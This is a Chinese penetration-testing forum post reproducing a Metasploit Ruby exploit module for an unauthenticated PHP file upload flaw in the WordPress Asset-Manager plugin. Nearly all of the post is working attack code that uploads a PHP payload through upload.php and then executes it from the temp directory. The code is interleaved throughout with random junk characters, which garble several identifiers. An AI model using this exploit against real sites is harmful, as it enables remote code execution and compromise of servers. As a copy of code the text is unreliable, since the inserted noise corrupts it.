找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2043|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。+ j8 b: F+ D& w# F: P

; I! n- S' J5 [* }##
' I4 y4 \% V" g* E, j# This file is part of the Metasploit Framework and may be subject to. m, o/ m6 Q0 q" T" P" O( Z' M, s% P
# redistribution and commercial restrictions. Please see the Metasploit
' q+ ?# s, a9 ^' u4 |+ c9 }# Framework web site for more information on licensing and terms of use.
. O5 [/ [  N/ E5 R& D$ X9 X7 M#   http://metasploit.com/framework/1 c. c5 i0 Z* g: Q
##
3 F4 X$ U- H' c8 y& A9 K& X
/ J. U0 u. ?8 }( I$ d- h# v9 Yrequire 'msf/core'  E: X( w) N8 h2 K
require 'msf/core/exploit/php_exe'1 }; ?7 |0 u* w0 ]9 `3 r

. q3 p. u9 g. d- }class Metasploit3 < Msf::Exploit::Remote
' l2 x! g. k6 x+ y  Rank = ExcellentRanking
& L: n0 a! S# l% U2 N6 [1 z5 d, t* ^- G ) F" p" Y8 B! Y5 V9 l
  include Msf::Exploit::Remote::HttpClient9 q5 ?/ {+ Q* q" u- P+ v9 h
  include Msf::Exploit:hpEXE$ G- `" Q  o6 [
' R7 a+ E' Y9 ]2 `8 O% \* V2 P, I7 n
  def initialize(info = {})
" d% d6 W# N" I' [. @    super(update_info(info,) A, ]- D7 E% f* i1 M7 z6 d
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',' o* ]) \* V$ [4 E. A3 g, m
      'Description'    => %q{6 f0 C5 q# ^; i2 X: j; h
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress" T6 h' |+ ?4 B  [2 a
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a! N2 L0 \0 Q- p2 D! B/ a
        temp directory without authentication, which results in arbitrary code execution.
8 f3 p/ H) j& _! Z2 n      },
6 Q2 C. J, P' q$ g      'Author'         =>
" v9 j  n3 Y6 I2 S# O$ L        [9 [2 H& [1 m' L9 A6 N" p
          'Sammy FORGIT', # initial discovery
: [9 h$ M5 [: y0 L) z          'James Fitts <fitts.james[at]gmail.com>' # metasploit module/ _# F& c' J2 a0 c# s
        ],
. G, m. J+ P% ^) n      'License'        => MSF_LICENSE,: b( p4 T2 U+ g: ^) K: Y4 K% R. v
      'References'     =>$ Z) w. N- C" ^  a5 H: @
        [
5 [7 F. V+ s6 _, z          [ 'OSVDB', '82653' ],
9 n7 d1 K4 @7 \0 W( V          [ 'BID', '53809' ],9 s' ^; Q2 z! x# o7 X- |: h* P
          [ 'EDB', '18993' ],: p' L. i$ s1 F: h) S$ @
          [ 'URL', 'http:// www.myhack58.com /' ]# |$ T( W7 D$ Z. P( J6 N  V$ l# r8 R& V
        ],# g3 [# B1 `5 g- Z! r$ Z
      'Payload'       =>9 X" I( r* T  K3 @: _
        {3 J* P7 x! x6 x* Q2 m) j
          'BadChars' => "\x00",
  |" D; S1 O* y4 m- n: ]. e5 ]        },, B# {/ V' b% t5 g3 r
      'Platform'       => 'php',0 \) p% Q8 {, I" l! K
      'Arch'           => ARCH_PHP,- A: C2 v$ d9 f/ G, Q0 m( i8 k8 l
      'Targets'        =>
$ f( s& q3 f# Q. x        [; A' }2 K: V1 b
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],2 J- E4 Y4 k/ n  q0 t( ~
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]  D9 h5 q+ a/ L3 Z6 h
        ],5 ?+ p3 S9 K3 a, S. p) u* y8 t
      'DefaultTarget' => 0,
* K8 Z- h. Y% S1 ^/ G+ S+ R' J      'DisclosureDate' => 'May 26 2012'))
. J! a, T( D2 A0 R+ q& | ! R# n& g) d7 H  C  B, I
    register_options(4 T- j1 p9 f/ t+ \0 G
      [2 S7 u1 x0 z1 g8 r
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])& `' Y4 C2 }' {
      ], self.class)
# s" M2 S$ v) s  end
) {) R: E1 x& n, V3 T- r1 }
& @5 y/ W' i6 b. I$ X  def exploit+ q: o' {+ `1 `- o7 t4 k! g9 K
    uri =  target_uri.path
1 V0 j/ A+ R' v    uri << '/' if uri[-1,1] != '/'
( U, r4 g$ Z3 e! h+ J* M1 }    peer = "#{rhost}:#{rport}". Q* c* s% I( U5 J# _
    payload_name = "#{rand_text_alpha(5)}.php"
5 N7 d, ~3 P, z, L$ [2 z    php_payload = get_write_exec_payload(:unlink_self=>true)2 Y! k$ X, K! z/ Z6 ^& q8 R
0 S+ o3 c( c2 ?( C- C+ @
    data = Rex::MIME::Message.new% [* e5 _6 }$ u) _' k  `5 `2 w  B
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
6 N# L, V5 V" v# ?( a: c    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')" M! m, M- I: S
& `; D0 M" `6 K3 W0 Z
    print_status("#{peer} - Uploading payload #{payload_name}")
7 p! z. b; I! t+ B- w% M2 H    res = send_request_cgi({
/ Y: p* k- H5 M- }% [      'method'  => 'POST',- ~" N/ H8 a* A( i! B# q
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
( B! R4 P; G- K% n& v. X4 ~" M      'ctype'   => "multipart/form-data; boundary=#{data.bound}",# K( c% V# x  L/ b6 w  y
      'data'    => post_data
. y, Y- H( {* \- w1 i$ L    })( G$ Q7 ~# X, |& m

( x  H+ b1 O8 J- E8 x    if not res or res.code != 200 or res.body !~ /#{payload_name}/5 l3 a  q# p9 l- }; v
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
( u* g! z& K: U* W$ T% Yend9 i& T. E5 ]) c0 Z2 s
7 P1 I9 Z0 X8 Q( h
    print_status("#{peer} - Executing payload #{payload_name}")
5 y; s1 J5 c( j3 M4 ]- j! c    res = send_request_raw({, y  r/ @( J9 K
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",/ P  D$ c0 A3 \" v  M  h
      'method'  => 'GET'! E+ U- _+ }  P& \' S
    })9 g  X+ m6 K' j# f. h! t/ |+ C
+ P+ |! D: ^1 Z( q) }+ f. J( T' A9 I
    if res and res.code != 200
$ N. o6 v5 G8 y- o  g+ i      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
7 F% A0 q$ R. |# y* R6 X! s    end
, \9 q& o" u3 s$ s  Y& a6 Q  end
% y" }4 A% `% K5 L" f1 }  eend( u$ g" z  Q) ]9 \% ^( A
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表